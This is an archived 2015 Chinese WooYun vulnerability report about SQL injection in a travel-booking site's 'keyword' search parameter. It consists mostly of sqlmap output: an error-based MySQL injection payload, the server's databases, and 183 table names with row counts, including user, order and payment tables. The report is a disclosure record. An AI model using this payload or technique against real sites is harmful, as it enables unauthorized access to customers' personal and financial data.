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漏洞作者: me1ody

提交时间:2015-09-19 22:53

修复时间:2015-11-03 22:54

公开时间:2015-11-03 22:54





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-09-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-03: 厂商已经主动忽略漏洞,细节向公众公开


权6 pr4
泄露 过万用户信息 账户里面有钱




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: keyword (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: keyword=大连" AND (SELECT 4408 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4408=4408,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "Fgzi"="Fgzi
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
available databases [7]:
[*] binlog
[*] information_schema
[*] kekedb
[*] mysql
[*] test
[*] visit
[*] wabuw
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: keyword (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: keyword=大连" AND (SELECT 4408 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4408=4408,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "Fgzi"="Fgzi
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
Database: wabuw
[183 tables]
| wabu__attr |
| wabu_about |
| wabu_accounting |
| wabu_address_book |
| wabu_address_book_dept |
| wabu_admin |
| wabu_admin_access |
| wabu_admin_group |
| wabu_admin_keyword |
| wabu_admin_log |
| wabu_admin_menus |
| wabu_admin_module |
| wabu_admin_module_group |
| wabu_advertisements |
| wabu_affixproduct |
| wabu_anchor |
| wabu_beforeque |
| wabu_black |
| wabu_blacktext |
| wabu_buyproducts |
| wabu_buyproducts_ccr_relation |
| wabu_caigou_car |
| wabu_caigou_contact |
| wabu_caigou_hotel |
| wabu_caigou_hotelprice |
| wabu_caigou_kind |
| wabu_caigou_lave |
| wabu_caigou_line |
| wabu_caigou_lineprice |
| wabu_caigou_other |
| wabu_caigou_ticket |
| wabu_caigou_visa |
| wabu_car |
| wabu_car_img_relation |
| wabu_category |
| wabu_category_attr |
| wabu_category_hotel |
| wabu_category_info |
| wabu_category_jd |
| wabu_category_line |
| wabu_city |
| wabu_class |
| wabu_class_attr |
| wabu_class_category_relation |
| wabu_class_relation |
| wabu_comment |
| wabu_content_ccr_relation |
| wabu_cruiseship |
| wabu_cruiseship_img_relation |
| wabu_cruiseship_line |
| wabu_cruiseship_pack |
| wabu_cruiseship_room |
| wabu_cruiseshiproom_price |
| wabu_departurecity |
| wabu_freeline_car_relation |
| wabu_freeline_price |
| wabu_freeline_room_relation |
| wabu_freeline_singleroom |
| wabu_groupbooking |
| wabu_help |
| wabu_hotel |
| wabu_hotel_ccr_relation |
| wabu_hotel_room |
| wabu_hotel_tag_relation |
| wabu_image |
| wabu_indexflash |
| wabu_info |
| wabu_info_ccr_relation |
| wabu_info_snap |
| wabu_info_tag_relation |
| wabu_keyword |
| wabu_kite |
| wabu_knowledge |
| wabu_knowledge_ccr_relation |
| wabu_landscape |
| wabu_landscape_ccr_relation |
| wabu_landscape_img_relation |
| wabu_landscape_snap |
| wabu_landscape_tag_relation |
| wabu_lave_payment |
| wabu_lave_paymented |
| wabu_laveorder_payment |
| wabu_laveorder_paymented |
| wabu_line |
| wabu_line_affix_relation |
| wabu_line_append |
| wabu_line_attr |
| wabu_line_ccr_relation |
| wabu_line_collection |
| wabu_line_groupprice |
| wabu_line_img_relation |
| wabu_line_search |
| wabu_line_setcarsprice |
| wabu_line_special |
| wabu_line_zifei |
| wabu_linecodot |
| wabu_linefreeman |
| wabu_linefreemanprice |
| wabu_linegbook |
| wabu_linehotelpack |
| wabu_linehotelprice |
| wabu_lineprice |
| wabu_link |
| wabu_lnvoice |
| wabu_mailrelation |
| wabu_mailsubscription |
| wabu_meetinginfo |
| wabu_meetingplace |
| wabu_meetingplace_img_relation |
| wabu_message |
| wabu_neworders |
| wabu_option |
| wabu_order_car |
| wabu_order_contents |
| wabu_order_contract |
| wabu_order_contract_type |
| wabu_order_coupon |
| wabu_order_groupon |
| wabu_order_invoice |
| wabu_order_lave |
| wabu_order_member |
| wabu_order_num |
| wabu_order_other |
| wabu_order_pact |
| wabu_order_payment |
| wabu_order_paymented |
| wabu_order_room |
| wabu_order_status |
| wabu_order_team |
| wabu_order_ticket |
| wabu_order_ticketcard |
| wabu_orderlave_v |
| wabu_other_payment |
| wabu_payment_refund |
| wabu_phone_base |
| wabu_phone_pack |
| wabu_phone_pack_template |
| wabu_process |
| wabu_question |
| wabu_receipt |
| wabu_redeem |
| wabu_relation_attr |
| wabu_remind |
| wabu_search_keyword |
| wabu_seo |
| wabu_siteevalucation |
| wabu_sorce |
| wabu_stationletters |
| wabu_statistics |
| wabu_status |
| wabu_status_child |
| wabu_stymsms |
| wabu_subject |
| wabu_supplier |
| wabu_supplier_contact |
| wabu_supplier_hotelprice |
| wabu_supplier_kind |
| wabu_supplier_lineprice |
| wabu_sys_deduct |
| wabu_sys_deductgroup |
| wabu_table_attr |
| wabu_tag |
| wabu_tags |
| wabu_tem_class |
| wabu_tem_landscape_area |
| wabu_tour_base |
| wabu_tour_pack |
| wabu_tour_pack_hotel |
| wabu_tour_pack_hotel1 |
| wabu_tour_ticket_template |
| wabu_travel |
| wabu_tuan_juan |
| wabu_tuan_orders |
| wabu_user |
| wabu_user_attribution |
| wabu_user_consult |
| wabu_userquestion |
| wabu_visa |
| wabu_visa_ccr_relation |
| wabu_visaorder |
| wabu_website |
| wabu_weixin_class |
| wabu_weixin_line |
Database: wabuw
| Table | Entries |
| wabu_stymsms | 168360 |
| wabu_landscape_ccr_relation | 133411 |
| wabu_info_ccr_relation | 96055 |
| wabu_image | 60917 |
| wabu_lineprice | 55692 |
| wabu_neworders | 52838 |
| wabu_order_contents | 50155 |
| wabu_landscape_img_relation | 36951 |
| wabu_user | 31048 |
| wabu_order_status | 27790 |
| wabu_line_img_relation | 25998 |
| wabu_line_ccr_relation | 23978 |
| wabu_info_tag_relation | 22167 |
| wabu_admin_keyword | 20250 |
| wabu_linehotelprice | 19823 |
| wabu_class_category_relation | 19608 |
| wabu_linefreemanprice | 19384 |
| wabu_message | 19338 |
| wabu_kite | 19258 |
| wabu_sorce | 17532 |
| wabu_order_lave | 16936 |
| wabu_comment | 15044 |
| wabu_seo | 14460 |
| wabu_travel | 13788 |
| wabu_order_member | 13278 |
| wabu_order_payment | 12008 |
| wabu_info | 9443 |
| wabu_orderlave_v | 9429 |
| wabu_laveorder_payment | 9107 |
| wabu_category_jd | 8645 |
| wabu_order_coupon | 8000 |
| wabu_stationletters | 7924 |
| wabu_class_attr | 7684 |
| wabu_landscape | 6823 |
| wabu_user_consult | 5916 |
| wabu_order_contract | 5327 |
| wabu_order_pact | 4738 |
| wabu_order_invoice | 4473 |
| wabu_hotel_ccr_relation | 4342 |
| wabu_city | 3683 |
| wabu_laveorder_paymented | 3431 |
| wabu_hotel_room | 3401 |
| wabu_lave_payment | 3224 |
| wabu_category_info | 2713 |
| wabu_other_payment | 2710 |
| wabu_line | 2590 |
| wabu_tag | 2540 |
| wabu_supplier_contact | 2490 |
| wabu_line_search | 2457 |
| wabu_supplier_lineprice | 2416 |
| wabu_admin_access | 2271 |
| wabu_category_line | 1902 |
| wabu_caigou_contact | 1811 |
| wabu_tem_class | 1618 |
| wabu_keyword | 1544 |
| wabu_blacktext | 1352 |
| wabu_accounting | 1343 |
| wabu_phone_pack | 1230 |
| wabu_supplier | 1197 |
| wabu_question | 1186 |
| wabu_hotel | 1104 |
| wabu_visa_ccr_relation | 1070 |
| wabu_class | 1035 |
| wabu_admin_log | 876 |
| wabu_tour_pack_hotel | 821 |
| wabu_sys_deduct | 752 |
| wabu_cruiseshiproom_price | 735 |
| wabu_linefreeman | 571 |
| wabu_cruiseship_img_relation | 556 |
| wabu_tour_pack_hotel1 | 532 |
| wabu_caigou_lave | 525 |
| wabu_weixin_line | 497 |
| wabu_tour_ticket_template | 464 |
| wabu_admin_module | 433 |
| wabu_landscape_tag_relation | 431 |
| wabu_tour_pack | 401 |
| wabu_payment_refund | 323 |
| wabu_knowledge | 309 |
| wabu_caigou_hotel | 307 |
| wabu_subject | 304 |
| wabu_phone_base | 249 |
| wabu_advertisements | 242 |
| wabu_category | 242 |
| wabu_hotel_tag_relation | 209 |
| wabu_status_child | 208 |
| wabu_lave_paymented | 190 |
| wabu_order_car | 178 |
| wabu_order_room | 166 |
| wabu_cruiseship | 164 |
| wabu_visa | 149 |
| wabu_weixin_class | 145 |
| wabu_option | 142 |
| wabu_supplier_kind | 142 |
| wabu_linehotelpack | 135 |
| wabu_supplier_hotelprice | 135 |
| wabu_line_setcarsprice | 130 |
| wabu_help | 124 |
| wabu_link | 121 |
| wabu_category_hotel | 117 |
| wabu_lnvoice | 105 |
| wabu_order_ticketcard | 100 |
| wabu_search_keyword | 97 |
| wabu_relation_attr | 92 |
| wabu_linecodot | 91 |
| wabu_anchor | 85 |
| wabu_cruiseship_pack | 83 |
| wabu_cruiseship_line | 79 |
| wabu_order_ticket | 72 |
| wabu_line_special | 71 |
| wabu_tem_landscape_area | 68 |
| wabu_cruiseship_room | 67 |
| wabu_indexflash | 64 |
| wabu_groupbooking | 62 |
| wabu_line_groupprice | 59 |
| wabu_freeline_price | 56 |
| wabu_redeem | 56 |
| wabu_order_paymented | 53 |
| wabu_caigou_hotelprice | 52 |
| wabu_admin | 47 |
| wabu_about | 45 |
| wabu_address_book | 41 |
| wabu_black | 40 |
| wabu_meetinginfo | 37 |
| wabu_caigou_car | 36 |
| wabu_order_team | 35 |
| wabu_freeline_car_relation | 33 |
| wabu_admin_module_group | 32 |
| wabu_car_img_relation | 30 |
| wabu_siteevalucation | 23 |
| wabu_status | 23 |
| wabu_knowledge_ccr_relation | 22 |
| wabu_caigou_other | 21 |
| wabu_tuan_orders | 20 |
| wabu_admin_group | 19 |
| wabu_receipt | 17 |
| wabu_buyproducts_ccr_relation | 16 |
| wabu_line_affix_relation | 16 |
| wabu_line_zifei | 16 |
| wabu_info_snap | 15 |
| wabu_process | 14 |
| wabu_order_groupon | 13 |
| wabu_userquestion | 13 |
| wabu_caigou_ticket | 12 |
| wabu_order_other | 12 |
| wabu_tour_base | 12 |
| wabu_tuan_juan | 12 |
| wabu_freeline_room_relation | 10 |
| wabu_beforeque | 9 |
| wabu_car | 9 |
| wabu_buyproducts | 8 |
| wabu_visaorder | 8 |
| wabu_affixproduct | 7 |
| wabu_user_attribution | 7 |
| wabu_departurecity | 6 |
| wabu_freeline_singleroom | 6 |
| wabu_mailrelation | 6 |
| wabu_tags | 6 |
| wabu_address_book_dept | 5 |
| wabu_line_append | 5 |
| wabu_line_collection | 5 |
| wabu_category_attr | 4 |
| wabu_landscape_snap | 3 |
| wabu_order_contract_type | 3 |
| wabu_order_num | 3 |
| wabu_caigou_kind | 2 |
| wabu_linegbook | 2 |
| wabu_mailsubscription | 2 |
| wabu_caigou_visa | 1 |
| wabu_class_relation | 1 |
| wabu_meetingplace | 1 |
| wabu_phone_pack_template | 1 |
| wabu_website | 1 |





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版权声明:转载请注明来源 me1ody@乌云




漏洞Rank:15 (WooYun评价)